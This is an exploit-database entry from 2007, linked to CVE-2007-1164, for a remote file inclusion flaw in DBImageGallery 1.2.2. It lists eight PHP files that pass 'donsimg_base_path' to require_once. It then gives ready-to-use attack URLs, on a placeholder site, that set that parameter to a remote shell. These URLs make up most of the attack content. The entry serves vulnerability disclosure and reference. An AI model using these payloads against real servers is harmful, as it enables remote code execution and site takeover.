Lucene search
DenvenEDB-ID:3353HistoryFeb 21, 2007 - 12:00 a.m.
DBImageGallery 1.2.2 - 'donsimg_base_path' Remote File Inclusion
2007-02-2100:00:00
Denven
www.exploit-db.com
23
AI Score
7.4
Confidence
Low
DBImageGallery 1.2.2
*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=1
*****************
ERROR:
admin/attributes.php require_once $donsimg_base_path
admin/images.php require_once $donsimg_base_path
admin/scan.php require_once $donsimg_base_path
includes/attributes.php require_once $donsimg_base_path
includes/db_utils.php require_once $donsimg_base_path
includes/images.php require_once $donsimg_base_path
includes/utils.php require_once $donsimg_base_path
includes/values.php require_once $donsimg_base_path
**************************************************************************************
RFI:
http://SITE.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/values.php?donsimg_base_path=[SHELL]
**************************************************************************************
denven[at]gmail[dot]com
# milw0rm.com [2007-02-21]Related
prion
prion
Remote file inclusion
2007-03-02 21:18:00
cvelist
cvelist
CVE-2007-1164
2007-02-28 15:00:00
nvd
nvd
CVE-2007-1164
2007-03-02 21:18:00
cve
cve
CVE-2007-1164
2007-03-02 21:18:00
securityvulns
securityvulns